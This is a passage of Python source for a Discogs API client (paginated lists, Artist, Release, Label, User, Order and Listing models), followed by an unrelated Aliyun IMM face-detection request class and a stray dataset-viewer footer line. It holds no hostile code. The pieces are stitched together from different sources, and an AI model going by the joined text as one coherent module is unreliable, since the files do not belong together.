if key in self._known_invalid_keys:
return default
try:
# First, look in the cache of pending changes
return self.changes[key]
except KeyError:
pass
try:
# Next, look in the potentially incomplete local cache
return self.data[key]
except KeyError:
pass
# Now refresh the object from its resource_url.
# The key might exist but not be in our cache.
self.refresh()
try:
return self.data[key]
except:
self._known_invalid_keys.append(key)
return default
# This is terribly cheesy, but makes the client API more consistent
class SecondaryAPIObject(APIObject):
"""
An object that wraps parts of a response and doesn't have its own
endpoint.
"""
def __init__(self, client, dict_):
self.client = client
self.data = dict_
def fetch(self, key, default=None):
return self.data.get(key, default)
class BasePaginatedResponse(object):
"""Base class for lists of objects spread across many URLs."""
def __init__(self, client, url):
self.client = client
self.url = url
self._num_pages = None
self._num_items = None
self._pages = {}
self._per_page = 50
self._list_key = 'items'
self._sort_key = None
self._sort_order = 'asc'
self._filters = {}
@property
def per_page(self):
return self._per_page
@per_page.setter
def per_page(self, value):
self._per_page = value
self._invalidate()
def _invalidate(self):
self._pages = {}
self._num_pages = None
self._num_items = None
def _load_pagination_info(self):
data = self.client._get(self._url_for_page(1))
self._pages[1] = [
self._transform(item) for item in data[self._list_key]
]
self._num_pages = data['pagination']['pages']
self._num_items = data['pagination']['items']
def _url_for_page(self, page):
base_qs = {
'page': page,
'per_page': self._per_page,
}
if self._sort_key is not None:
base_qs.update({
'sort': self._sort_key,
'sort_order': self._sort_order,
})
base_qs.update(self._filters)
return update_qs(self.url, base_qs)
def sort(self, key, order='asc'):
if order not in ('asc', 'desc'):
raise ValueError("Order must be one of 'asc', 'desc'")
self._sort_key = key
self._sort_order = order
self._invalidate()
return self
def filter(self, **kwargs):
self._filters = kwargs
self._invalidate()
return self
@property
def pages(self):
if self._num_pages is None:
self._load_pagination_info()
return self._num_pages
@property
def count(self):
if self._num_items is None:
self._load_pagination_info()
return self._num_items
def page(self, index):
if index not in self._pages:
data = self.client._get(self._url_for_page(index))
self._pages[index] = [
self._transform(item) for item in data[self._list_key]
]
return self._pages[index]
def _transform(self, item):
return item
def __getitem__(self, index):
page_index = index // self.per_page + 1
offset = index % self.per_page
try:
page = self.page(page_index)
except HTTPError as e:
if e.status_code == 404:
raise IndexError(e.msg)
else:
raise
return page[offset]
def __len__(self):
return self.count
def __iter__(self):
for i in range(1, self.pages + 1):
page = self.page(i)
for item in page:
yield item
class PaginatedList(BasePaginatedResponse):
"""A paginated list of objects of a particular class."""
def __init__(self, client, url, key, class_):
super(PaginatedList, self).__init__(client, url)
self._list_key = key
self.class_ = class_
def _transform(self, item):
return self.class_(self.client, item)
class Wantlist(PaginatedList):
def add(self, release, notes=None, notes_public=None, rating=None):
release_id = release.id if isinstance(release, Release) else release
data = {
'release_id': str(release_id),
'notes': notes,
'notes_public': notes_public,
'rating': rating,
}
self.client._put(self.url + '/' + str(release_id), omit_none(data))
self._invalidate()
def remove(self, release):
release_id = release.id if isinstance(release, Release) else release
self.client._delete(self.url + '/' + str(release_id))
self._invalidate()
class OrderMessagesList(PaginatedList):
def add(self, message=None, status=None, email_buyer=True, email_seller=False):
data = {
'message': message,
'status': status,
'email_buyer': email_buyer,
'email_seller': email_seller,
}
self.client._post(self.url, omit_none(data))
self._invalidate()
class MixedPaginatedList(BasePaginatedResponse):
"""A paginated list of objects identified by their type parameter."""
def __init__(self, client, url, key):
super(MixedPaginatedList, self).__init__(client, url)
self._list_key = key
def _transform(self, item):
# In some cases, we want to map the 'title' key we get back in search
# results to 'name'. This way, you can repr() a page of search results
# without making 50 requests.
if item['type'] in ('label', 'artist'):
item['name'] = item['title']
return CLASS_MAP[item['type']](self.client, item)
class Artist(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
real_name = SimpleField(key='realname')
images = SimpleField()
profile = SimpleField()
data_quality = SimpleField()
name_variations = SimpleField(key='namevariations')
url = SimpleField(key='uri')
urls = SimpleField()
aliases = ListField('Artist')
members = ListField('Artist')
groups = ListField('Artist')
def __init__(self, client, dict_):
super(Artist, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/artists/{1}'.format(client._base_url, dict_['id'])
@property
def releases(self):
return MixedPaginatedList(self.client, self.fetch('releases_url'), 'releases')
def __repr__(self):
return self.repr_str('<Artist {0!r} {1!r}>'.format(self.id, self.name))
class Release(PrimaryAPIObject):
id = SimpleField()
title = SimpleField()
year = SimpleField()
thumb = SimpleField()
data_quality = SimpleField()
status = SimpleField()
genres = SimpleField()
images = SimpleField()
country = SimpleField()
notes = SimpleField()
formats = SimpleField()
styles = SimpleField()
url = SimpleField(key='uri')
videos = ListField('Video')
tracklist = ListField('Track')
artists = ListField('Artist')
credits = ListField('Artist', key='extraartists')
labels = ListField('Label')
companies = ListField('Label')
def __init__(self, client, dict_):
super(Release, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/releases/{1}'.format(client._base_url, dict_['id'])
@property
def master(self):
master_id = self.fetch('master_id')
if master_id:
return Master(self.client, {'id': master_id})
else:
return None
def __repr__(self):
return self.repr_str('<Release {0!r} {1!r}>'.format(self.id, self.title))
class Master(PrimaryAPIObject):
id = SimpleField()
title = SimpleField()
data_quality = SimpleField()
styles = SimpleField()
genres = SimpleField()
images = SimpleField()
url = SimpleField(key='uri')
videos = ListField('Video')
tracklist = ListField('Track')
main_release = ObjectField('Release', as_id=True)
versions = ObjectCollection('Release')
def __init__(self, client, dict_):
super(Master, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/masters/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Master {0!r} {1!r}>'.format(self.id, self.title))
class Label(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
profile = SimpleField()
urls = SimpleField()
images = SimpleField()
contact_info = SimpleField()
data_quality = SimpleField()
url = SimpleField(key='uri')
sublabels = ListField('Label')
parent_label = ObjectField('Label', optional=True)
releases = ObjectCollection('Release')
def __init__(self, client, dict_):
super(Label, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/labels/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Label {0!r} {1!r}>'.format(self.id, self.name))
class User(PrimaryAPIObject):
id = SimpleField()
username = SimpleField()
releases_contributed = SimpleField()
num_collection = SimpleField()
num_wantlist = SimpleField()
num_lists = SimpleField()
rank = SimpleField()
rating_avg = SimpleField()
url = SimpleField(key='uri')
name = SimpleField(writable=True)
profile = SimpleField(writable=True)
location = SimpleField(writable=True)
home_page = SimpleField(writable=True)
registered = SimpleField(transform=parse_timestamp)
inventory = ObjectCollection('Listing', key='listings', url_key='inventory_url')
wantlist = ObjectCollection('WantlistItem', key='wants', url_key='wantlist_url', list_class=Wantlist)
def __init__(self, client, dict_):
super(User, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/users/{1}'.format(client._base_url, dict_['username'])
@property
def orders(self):
return PaginatedList(self.client, self.client._base_url + '/marketplace/orders', 'orders', Order)
@property
def collection_folders(self):
resp = self.client._get(self.fetch('collection_folders_url'))
return [CollectionFolder(self.client, d) for d in resp['folders']]
def __repr__(self):
return self.repr_str('<User {0!r} {1!r}>'.format(self.id, self.username))
class WantlistItem(PrimaryAPIObject):
id = SimpleField()
rating = SimpleField(writable=True)
notes = SimpleField(writable=True)
notes_public = SimpleField(writable=True)
release = ObjectField('Release', key='basic_information')
def __init__(self, client, dict_):
super(WantlistItem, self).__init__(client, dict_)
def __repr__(self):
return self.repr_str('<WantlistItem {0!r} {1!r}>'.format(self.id, self.release.title))
# TODO: folder_id should be a Folder object; needs folder_url
# TODO: notes should be first-order (somehow); needs resource_url
class CollectionItemInstance(PrimaryAPIObject):
id = SimpleField()
rating = SimpleField()
folder_id = SimpleField()
notes = SimpleField()
release = ObjectField('Release', key='basic_information')
def __init__(self, client, dict_):
super(CollectionItemInstance, self).__init__(client, dict_)
def __repr__(self):
return self.repr_str('<CollectionItemInstance {0!r} {1!r}>'.format(self.id, self.release.title))
class CollectionFolder(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
count = SimpleField()
def __init__(self, client, dict_):
super(CollectionFolder, self).__init__(client, dict_)
@property
def releases(self):
# TODO: Needs releases_url
return PaginatedList(self.client, self.fetch('resource_url') + '/releases', 'releases', CollectionItemInstance)
def __repr__(self):
return self.repr_str('<CollectionFolder {0!r} {1!r}>'.format(self.id, self.name))
class Listing(PrimaryAPIObject):
id = SimpleField()
status = SimpleField()
allow_offers = SimpleField()
condition = SimpleField()
sleeve_condition = SimpleField()
ships_from = SimpleField()
comments = SimpleField()
audio = SimpleField()
url = SimpleField(key='uri')
price = ObjectField('Price')
release = ObjectField('Release')
seller = ObjectField('User')
posted = SimpleField(transform=parse_timestamp)
def __init__(self, client, dict_):
super(Listing, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/marketplace/listings/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Listing {0!r} {1!r}>'.format(self.id, self.release.data['description']))
class Order(PrimaryAPIObject):
id = SimpleField()
next_status = SimpleField()
shipping_address = SimpleField()
additional_instructions = SimpleField()
url = SimpleField(key='uri')
status = SimpleField(writable=True)
fee = ObjectField('Price')
buyer = ObjectField('User')
seller = ObjectField('User')
created = SimpleField(transform=parse_timestamp)
last_activity = SimpleField(transform=parse_timestamp)
messages = ObjectCollection('OrderMessage', list_class=OrderMessagesList)
items = ListField('Listing')
def __init__(self, client, dict_):
super(Order, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/marketplace/orders/{1}'.format(client._base_url, dict_['id'])
# Setting shipping is a little weird -- you can't change the
# currency, and you use the 'shipping' key instead of 'value'
@property
def shipping(self):
return Price(self.client, self.fetch('shipping'))
@shipping.setter
def shipping(self, value):
self.changes['shipping'] = value
def __repr__(self):
return self.repr_str('<Order {0!r}>'.format(self.id))
class OrderMessage(SecondaryAPIObject):
subject = SimpleField()
message = SimpleField()
to = ObjectField('User')
order = ObjectField('Order')
timestamp = SimpleField(transform=parse_timestamp)
def __repr__(self):
return self.repr_str('<OrderMessage to:{0!r}>'.format(self.to.username))
class Track(SecondaryAPIObject):
duration = SimpleField()
position = SimpleField()
title = SimpleField()
artists = ListField('Artist')
credits = ListField('Artist', key='extraartists')
def __repr__(self):
return self.repr_str('<Track {0!r} {1!r}>'.format(self.position, self.title))
class Price(SecondaryAPIObject):
currency = SimpleField()
value = SimpleField()
def __repr__(self):
return self.repr_str('<Price {0!r} {1!r}>'.format(self.value, self.currency))
class Video(SecondaryAPIObject):
duration = SimpleField()
embed = SimpleField()
title = SimpleField()
description = SimpleField()
url = SimpleField(key='uri')
def __repr__(self):
return self.repr_str('<Video {0!r}>'.format(self.title))
CLASS_MAP = {
'artist': Artist,
'release': Release,
'master': Master,
'label': Label,
'price': Price,
'video': Video,
'track': Track,
'user': User,
'order': Order,
'listing': Listing,
'wantlistitem': WantlistItem,
'ordermessage': OrderMessage,
}
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkimm.endpoint import endpoint_data
class DetectImageFacesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'imm', '2017-09-06', 'DetectImageFaces','imm')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Project(self):
return self.get_query_params().get('Project')
def set_Project(self,Project):
self.add_query_param('Project',Project)
def get_ImageUri(self):
return self.get_query_params().get('ImageUri')
def set_ImageUri(self,ImageUri):
self.add_query_param('ImageUri',ImageUri)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.